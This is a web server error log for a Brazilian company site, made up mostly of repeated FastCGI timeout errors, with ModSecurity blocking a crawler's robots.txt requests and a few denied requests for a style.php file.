[Tue Mar 17 00:04:52.927532 2026] [:error] [pid 2325:tid 140411674785536] [client 74.7.244.31:37100] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjE1O82sZHvlq4xgHqMRwAAAog"]
[Tue Mar 17 00:04:54.122239 2026] [proxy_fcgi:error] [pid 2305:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:41612] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:05:16.237880 2026] [proxy_fcgi:error] [pid 2305:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:41782] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:05:38.145834 2026] [proxy_fcgi:error] [pid 2473:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:41872] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:05:59.132015 2026] [proxy_fcgi:error] [pid 2304:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:41982] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:06:21.241844 2026] [proxy_fcgi:error] [pid 2304:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:42138] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:06:43.145803 2026] [proxy_fcgi:error] [pid 2305:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:42340] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:07:04.041852 2026] [proxy_fcgi:error] [pid 2325:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:42608] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:07:25.125814 2026] [proxy_fcgi:error] [pid 4740:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:42864] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:07:38.067228 2026] [:error] [pid 2305:tid 140411540502272] [client 74.7.228.16:34156] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjFegQohV2v-7oj5HHIWAAAAZg"]
[Tue Mar 17 00:07:47.123912 2026] [proxy_fcgi:error] [pid 2473:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:43058] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:08:08.129816 2026] [proxy_fcgi:error] [pid 2473:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:43260] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:08:29.046214 2026] [proxy_fcgi:error] [pid 4740:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:43352] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:08:51.133858 2026] [proxy_fcgi:error] [pid 4740:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:43578] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:09:13.133808 2026] [proxy_fcgi:error] [pid 11293:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:43882] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:09:35.135315 2026] [proxy_fcgi:error] [pid 2305:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:44016] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:09:56.129772 2026] [proxy_fcgi:error] [pid 11293:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:44134] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:10:12.602101 2026] [:error] [pid 11469:tid 140411599251200] [client 74.7.244.31:36070] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjGFJDEJR9VXonE_-0UGQAAARE"]
[Tue Mar 17 00:10:17.045799 2026] [proxy_fcgi:error] [pid 11469:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:44438] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:10:39.131652 2026] [proxy_fcgi:error] [pid 11293:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:44646] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:11:00.045853 2026] [proxy_fcgi:error] [pid 4740:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:44856] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:11:21.113804 2026] [proxy_fcgi:error] [pid 4740:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:45050] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:11:42.129925 2026] [proxy_fcgi:error] [pid 11293:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:45196] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:12:05.130096 2026] [proxy_fcgi:error] [pid 11293:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:45336] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:12:46.045816 2026] [proxy_fcgi:error] [pid 2473:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:45688] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:13:05.627334 2026] [:error] [pid 11469:tid 140411691570944] [client 74.7.228.16:39790] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjGwZDEJR9VXonE_-0UVwAAAQY"]
[Tue Mar 17 00:13:07.033855 2026] [proxy_fcgi:error] [pid 11469:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:45826] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:13:28.045944 2026] [proxy_fcgi:error] [pid 2304:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:46048] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:13:49.117824 2026] [proxy_fcgi:error] [pid 2304:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:46254] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:14:10.115386 2026] [proxy_fcgi:error] [pid 2473:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:46480] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:14:32.081850 2026] [proxy_fcgi:error] [pid 4740:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:46662] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:14:53.138153 2026] [proxy_fcgi:error] [pid 2325:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:46830] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:15:14.125816 2026] [proxy_fcgi:error] [pid 11469:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:47108] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:15:18.075240 2026] [:error] [pid 2473:tid 140411599251200] [client 74.7.244.31:48036] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjHRqBJNF7axNlVR0XIKwAAABE"]
[Tue Mar 17 00:15:35.129801 2026] [proxy_fcgi:error] [pid 11293:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:47354] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:15:56.129882 2026] [proxy_fcgi:error] [pid 11469:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:47624] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:16:17.125826 2026] [proxy_fcgi:error] [pid 2325:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:47992] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:16:40.526804 2026] [proxy_fcgi:error] [pid 2305:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:48380] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:17:02.048731 2026] [proxy_fcgi:error] [pid 2304:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:48770] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:17:23.137815 2026] [proxy_fcgi:error] [pid 2473:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:49020] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:17:44.133805 2026] [proxy_fcgi:error] [pid 2305:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:49196] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:18:11.121794 2026] [proxy_fcgi:error] [pid 2305:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:49522] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:18:11.878110 2026] [:error] [pid 2325:tid 140411691570944] [client 74.7.228.16:38892] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjH8-82sZHvlq4xgHqNEgAAAoY"]
[Tue Mar 17 00:18:32.074360 2026] [proxy_fcgi:error] [pid 2473:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:49824] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:18:53.125779 2026] [proxy_fcgi:error] [pid 11293:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:50008] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:19:14.125943 2026] [proxy_fcgi:error] [pid 2305:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:50220] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:19:17.428157 2026] [access_compat:error] [pid 11469:tid 140411733534464] [client 38.127.61.169:59396] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/style.php
[Tue Mar 17 00:19:36.133817 2026] [proxy_fcgi:error] [pid 2325:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:50456] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:19:37.150454 2026] [access_compat:error] [pid 11469:tid 140411565680384] [client 38.127.61.169:37366] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/style.php
[Tue Mar 17 00:19:53.394459 2026] [access_compat:error] [pid 11469:tid 140411641214720] [client 38.127.61.169:20276] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/style.php
[Tue Mar 17 00:19:57.129858 2026] [proxy_fcgi:error] [pid 4740:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:50754] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:20:19.049847 2026] [proxy_fcgi:error] [pid 11293:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:51074] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:20:35.700611 2026] [:error] [pid 11293:tid 140411557287680] [client 74.7.244.31:56724] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjIg9CmCSWTlPouqoqUkAAAANY"]
[Tue Mar 17 00:20:40.137784 2026] [proxy_fcgi:error] [pid 2473:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:51282] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:21:03.658918 2026] [proxy_fcgi:error] [pid 4740:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:51500] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:21:25.069852 2026] [proxy_fcgi:error] [pid 2305:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:51666] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:21:47.106265 2026] [proxy_fcgi:error] [pid 4740:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:51908] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:22:09.122508 2026] [proxy_fcgi:error] [pid 2304:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:52162] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:22:30.125796 2026] [proxy_fcgi:error] [pid 11293:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:52320] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:22:43.018398 2026] [access_compat:error] [pid 2305:tid 140411674785536] [client 38.127.61.169:20126] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/style.php
[Tue Mar 17 00:22:51.034078 2026] [proxy_fcgi:error] [pid 2473:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:52554] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:23:13.129813 2026] [proxy_fcgi:error] [pid 2473:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:52830] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:23:34.070026 2026] [proxy_fcgi:error] [pid 2325:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:53000] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:23:37.253609 2026] [:error] [pid 4740:tid 140411548894976] [client 74.7.228.16:58108] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjJOQfYLcKp6Sb5AeICnAAAAFc"]
[Tue Mar 17 00:23:55.149774 2026] [proxy_fcgi:error] [pid 11293:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:53152] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:24:16.133978 2026] [proxy_fcgi:error] [pid 11293:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:53386] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:24:38.125839 2026] [proxy_fcgi:error] [pid 11293:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:53516] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:24:59.129813 2026] [proxy_fcgi:error] [pid 11293:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:53706] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:25:20.141809 2026] [proxy_fcgi:error] [pid 2473:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:53904] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:25:39.894957 2026] [:error] [pid 11469:tid 140411548894976] [client 74.7.244.31:34810] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjJs5DEJR9VXonE_-0VVAAAARc"]
[Tue Mar 17 00:25:41.065851 2026] [proxy_fcgi:error] [pid 2304:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:54058] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:26:02.099715 2026] [proxy_fcgi:error] [pid 2305:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:54336] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:26:23.069811 2026] [proxy_fcgi:error] [pid 2325:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:54676] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:26:46.130572 2026] [proxy_fcgi:error] [pid 11293:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:55072] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:27:09.142343 2026] [proxy_fcgi:error] [pid 11293:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:55384] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:27:30.147274 2026] [proxy_fcgi:error] [pid 11469:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:55596] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:27:51.131457 2026] [proxy_fcgi:error] [pid 4740:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:55782] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:28:12.129796 2026] [proxy_fcgi:error] [pid 11293:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:56070] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:28:34.129873 2026] [proxy_fcgi:error] [pid 11293:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:56362] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:28:55.129787 2026] [proxy_fcgi:error] [pid 2304:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:56524] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:29:16.129814 2026] [proxy_fcgi:error] [pid 11293:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:56664] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:29:38.117880 2026] [proxy_fcgi:error] [pid 2304:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:56824] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:30:02.158630 2026] [proxy_fcgi:error] [pid 2325:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:57050] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:30:23.123846 2026] [proxy_fcgi:error] [pid 11469:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:57176] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:30:44.145853 2026] [proxy_fcgi:error] [pid 4740:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:57292] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:31:04.655108 2026] [:error] [pid 11469:tid 140411649607424] [client 74.7.244.31:39112] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjK-JDEJR9VXonE_-0WGAAAAQs"]
[Tue Mar 17 00:31:05.121853 2026] [proxy_fcgi:error] [pid 11293:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:57464] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:31:26.130576 2026] [proxy_fcgi:error] [pid 11293:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:57666] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:31:48.061843 2026] [proxy_fcgi:error] [pid 4740:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:57852] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:32:09.327790 2026] [proxy_fcgi:error] [pid 4740:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:58062] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:32:31.034500 2026] [proxy_fcgi:error] [pid 2304:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:58154] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:32:52.126350 2026] [proxy_fcgi:error] [pid 2305:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:58296] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:33:14.121861 2026] [proxy_fcgi:error] [pid 11293:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:58502] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:33:35.103230 2026] [proxy_fcgi:error] [pid 2473:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:58674] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:33:56.133809 2026] [proxy_fcgi:error] [pid 2473:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:58788] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:34:18.133823 2026] [proxy_fcgi:error] [pid 11469:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:59004] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:34:39.113239 2026] [proxy_fcgi:error] [pid 2304:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:59210] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:35:00.133826 2026] [proxy_fcgi:error] [pid 4740:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:59392] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:35:24.129783 2026] [proxy_fcgi:error] [pid 2325:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:59574] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:35:45.135068 2026] [proxy_fcgi:error] [pid 2304:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:59724] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:36:06.122065 2026] [proxy_fcgi:error] [pid 11469:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:59900] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:36:28.129775 2026] [proxy_fcgi:error] [pid 11293:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:60166] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:36:49.115252 2026] [proxy_fcgi:error] [pid 11469:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:60304] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:37:10.124825 2026] [proxy_fcgi:error] [pid 11469:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:60426] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:37:32.129790 2026] [proxy_fcgi:error] [pid 2473:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:60646] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:37:54.126629 2026] [proxy_fcgi:error] [pid 11293:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:60824] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:38:15.130474 2026] [proxy_fcgi:error] [pid 2473:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:60966] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:38:36.129836 2026] [proxy_fcgi:error] [pid 4740:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:32952] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:38:58.129811 2026] [proxy_fcgi:error] [pid 2473:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:33100] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:39:10.154195 2026] [:error] [pid 2305:tid 140411683178240] [client 74.7.228.16:41362] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjM3gQohV2v-7oj5HHK1AAAAYc"]
[Tue Mar 17 00:39:20.033825 2026] [proxy_fcgi:error] [pid 4740:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:33296] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:39:41.125770 2026] [proxy_fcgi:error] [pid 11469:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:33520] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:40:02.147248 2026] [proxy_fcgi:error] [pid 4740:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:33662] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:40:23.129867 2026] [proxy_fcgi:error] [pid 2304:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:33752] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:40:45.130235 2026] [proxy_fcgi:error] [pid 2304:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:34052] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:41:07.117807 2026] [proxy_fcgi:error] [pid 2305:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:34356] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:41:28.133849 2026] [proxy_fcgi:error] [pid 4740:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:34522] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:41:37.193531 2026] [:error] [pid 2473:tid 140411607643904] [client 74.7.244.31:41046] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjNcaBJNF7axNlVR0XKRAAAABA"]
[Tue Mar 17 00:41:49.075116 2026] [proxy_fcgi:error] [pid 2325:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:34656] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:42:10.125822 2026] [proxy_fcgi:error] [pid 2473:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:34768] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:42:31.125873 2026] [proxy_fcgi:error] [pid 2325:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:34986] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:42:53.058927 2026] [proxy_fcgi:error] [pid 2305:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:35176] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:43:16.129786 2026] [proxy_fcgi:error] [pid 2473:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:35322] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:43:37.099066 2026] [proxy_fcgi:error] [pid 11469:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:35518] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:43:58.070034 2026] [proxy_fcgi:error] [pid 4740:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:35718] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:44:19.126957 2026] [proxy_fcgi:error] [pid 2305:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:35824] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:44:19.457334 2026] [:error] [pid 2304:tid 140411691570944] [client 74.7.228.16:45800] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjOE8h3JZxwdBQwPYHBsQAAAIY"]
[Tue Mar 17 00:44:41.125787 2026] [proxy_fcgi:error] [pid 2325:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:35974] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:45:02.384267 2026] [proxy_fcgi:error] [pid 2304:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:36202] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:45:24.122555 2026] [proxy_fcgi:error] [pid 2473:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:36348] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:45:45.139794 2026] [proxy_fcgi:error] [pid 11293:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:36596] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:46:07.081815 2026] [proxy_fcgi:error] [pid 4740:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:36760] AH01075: Error dispatching request to : (polling)
